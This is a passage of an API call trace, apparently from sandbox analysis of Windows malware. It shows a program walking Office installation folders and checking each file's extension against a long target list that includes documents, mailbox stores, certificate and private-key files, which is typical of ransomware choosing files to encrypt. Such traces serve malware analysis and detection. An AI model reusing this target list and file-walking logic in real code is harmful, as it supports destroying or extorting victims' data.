	[0033.008] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".odc") returned 4
	[0033.008] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".odm") returned 4
	[0033.008] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".odp") returned 4
	[0033.008] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".ods") returned 4
	[0033.008] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".oft") returned 4
	[0033.008] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".one") returned 4
	[0033.008] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".onepkg") returned 7
	[0033.008] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1
	[0033.008] lstrlenW (lpString=".onetoc2") returned 8
	[0033.008] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1
	[0033.008] lstrlenW (lpString=".opt") returned 4
	[0033.008] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".oqy") returned 4
	[0033.008] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".orf") returned 4
	[0033.008] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".p12") returned 4
	[0033.008] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".p7b") returned 4
	[0033.008] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".p7c") returned 4
	[0033.008] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".pam") returned 4
	[0033.008] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".pbm") returned 4
	[0033.009] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pct") returned 4
	[0033.009] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pcx") returned 4
	[0033.009] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pdd") returned 4
	[0033.009] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pdf") returned 4
	[0033.009] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pdp") returned 4
	[0033.009] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pef") returned 4
	[0033.009] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pem") returned 4
	[0033.009] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pff") returned 4
	[0033.009] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pfm") returned 4
	[0033.009] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pfx") returned 4
	[0033.009] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".pgm") returned 4
	[0033.009] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".php") returned 4
	[0033.009] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1
	[0033.009] lstrlenW (lpString=".php3") returned 5
	[0033.009] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1
	[0033.009] lstrlenW (lpString=".php4") returned 5
	[0033.009] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1
	[0033.009] lstrlenW (lpString=".php5") returned 5
	[0033.009] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1
	[0033.009] lstrlenW (lpString=".phtml") returned 6
	[0033.009] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1
	[0033.009] lstrlenW (lpString=".pict") returned 5
	[0033.009] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".pl") returned 3
	[0033.010] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1
	[0033.010] lstrlenW (lpString=".pls") returned 4
	[0033.010] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".pm") returned 3
	[0033.010] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1
	[0033.010] lstrlenW (lpString=".png") returned 4
	[0033.010] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".pnm") returned 4
	[0033.010] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".pot") returned 4
	[0033.010] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".potm") returned 5
	[0033.010] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".potx") returned 5
	[0033.010] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".ppa") returned 4
	[0033.010] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".ppam") returned 5
	[0033.010] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".ppm") returned 4
	[0033.010] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".pps") returned 4
	[0033.010] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".ppsm") returned 5
	[0033.010] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".ppt") returned 4
	[0033.010] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".pptm") returned 5
	[0033.010] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".pptx") returned 5
	[0033.010] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1
	[0033.010] lstrlenW (lpString=".prn") returned 4
	[0033.010] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1
	[0033.010] lstrlenW (lpString=".ps") returned 3
	[0033.010] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1
	[0033.011] lstrlenW (lpString=".psb") returned 4
	[0033.011] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".psd") returned 4
	[0033.011] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".pst") returned 4
	[0033.011] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".ptx") returned 4
	[0033.011] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".pub") returned 4
	[0033.011] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".pwm") returned 4
	[0033.011] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".pxr") returned 4
	[0033.011] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1
	[0033.011] lstrlenW (lpString=".py") returned 3
	[0033.011] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1
	[0033.011] lstrlenW (lpString=".qt") returned 3
	[0033.011] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1
	[0033.011] lstrlenW (lpString=".r3d") returned 4
	[0033.011] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1
	[0035.038] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="..", cAlternateFileName="")) returned 1
	[0035.038] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1
	[0035.038] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned 1
	[0035.038] lstrcmpiW (lpString1="C:\\Windows", lpString2="Access.en-us") returned 1
	[0035.038] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb4bb740
	[0035.038] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.039] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.039] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.XML", cAlternateFileName="ACCESS~1.XML")) returned 1
	[0035.039] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0035.039] lstrcmpiW (lpString1=".3ds", lpString2=".XML") returned -1
	[0035.039] lstrcmpiW (lpString1=".3fr", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".3g2", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".3gp", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".accda", lpString2="UI.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".accdb", lpString2="UI.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".accdc", lpString2="UI.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".accde", lpString2="UI.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".accdt", lpString2="UI.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".accdw", lpString2="UI.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".adb", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".adp", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai", lpString2="XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai3", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai4", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai5", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai6", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai7", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".ai8", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".anim", lpString2="I.XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".arw", lpString2=".XML") returned -1
	[0035.040] lstrcmpiW (lpString1=".as", lpString2="XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asa", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asc", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".ascx", lpString2="I.XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asm", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asmx", lpString2="I.XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asp", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".aspx", lpString2="I.XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asr", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".asx", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".avi", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".avs", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".backup", lpString2="MUI.XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".bak", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".bay", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".bd", lpString2="XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".bin", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".bmp", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".c", lpString2="ML") returned -1
	[0035.041] lstrcmpiW (lpString1=".cdr", lpString2=".XML") returned -1
	[0035.041] lstrcmpiW (lpString1=".cer", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cf", lpString2="XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cfc", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cfm", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cfml", lpString2="I.XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cfu", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".chm", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cin", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".class", lpString2="UI.XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".clx", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".config", lpString2="MUI.XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cpp", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cr2", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".crt", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".crw", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cs", lpString2="XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".css", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".csv", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".cub", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".dae", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".dat", lpString2=".XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".db", lpString2="XML") returned -1
	[0035.042] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dbx", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dc3", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dcm", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dcr", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".der", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dib", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dic", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dif", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".divx", lpString2="I.XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".djvu", lpString2="I.XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dng", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".docm", lpString2="I.XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dot", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dotm", lpString2="I.XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dotx", lpString2="I.XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dpx", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dqy", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dsn", lpString2=".XML") returned -1
	[0035.043] lstrcmpiW (lpString1=".dt", lpString2="XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".dtd", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".dwg", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".dwt", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".dx", lpString2="XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".dxf", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".edml", lpString2="I.XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".efd", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".elf", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".emf", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".emz", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".epf", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".eps", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".epsf", lpString2="I.XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".epsp", lpString2="I.XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".erf", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".exr", lpString2=".XML") returned -1
	[0035.044] lstrcmpiW (lpString1=".f4v", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".fido", lpString2="I.XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".flm", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".flv", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".frm", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".fxg", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".geo", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".gif", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".grs", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".gz", lpString2="XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".h", lpString2="ML") returned -1
	[0035.045] lstrcmpiW (lpString1=".hdr", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".hpp", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".hta", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".htc", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".htm", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".html", lpString2="I.XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".icb", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".ics", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".iff", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".inc", lpString2=".XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".indd", lpString2="I.XML") returned -1
	[0035.045] lstrcmpiW (lpString1=".ini", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".iqy", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".j2c", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".j2k", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".java", lpString2="I.XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jp2", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jpc", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jpe", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jpeg", lpString2="I.XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jpf", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jpx", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".js", lpString2="XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jsf", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".json", lpString2="I.XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".jsp", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".kdc", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".kmz", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".kwm", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".lasso", lpString2="UI.XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".lbi", lpString2=".XML") returned -1
	[0035.046] lstrcmpiW (lpString1=".lgf", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".lgp", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".log", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".m1v", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".m4a", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".m4v", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".max", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".md", lpString2="XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mda", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mdb", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mde", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mdf", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mdw", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mef", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mft", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mfw", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mht", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mhtml", lpString2="UI.XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mka", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mkidx", lpString2="UI.XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mkv", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mos", lpString2=".XML") returned -1
	[0035.047] lstrcmpiW (lpString1=".mov", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mp3", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mp4", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mpeg", lpString2="I.XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mpg", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mpv", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mrw", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".msg", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".mxl", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".myd", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".myi", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".nef", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".nrw", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".obj", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".odb", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".odc", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".odm", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".odp", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".ods", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".oft", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".one", lpString2=".XML") returned -1
	[0035.048] lstrcmpiW (lpString1=".onepkg", lpString2="MUI.XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".onetoc2", lpString2="sMUI.XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".opt", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".oqy", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".orf", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".p12", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".p7b", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".p7c", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pam", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pbm", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pct", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pcx", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pdd", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pdp", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pef", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pem", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pff", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pfm", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pfx", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".pgm", lpString2=".XML") returned -1
	[0035.049] lstrcmpiW (lpString1=".php", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".php3", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".php4", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".php5", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".phtml", lpString2="UI.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pict", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pl", lpString2="XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pls", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pm", lpString2="XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".png", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pnm", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pot", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".potm", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".potx", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".ppa", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".ppam", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".ppm", lpString2=".XML") returned -1
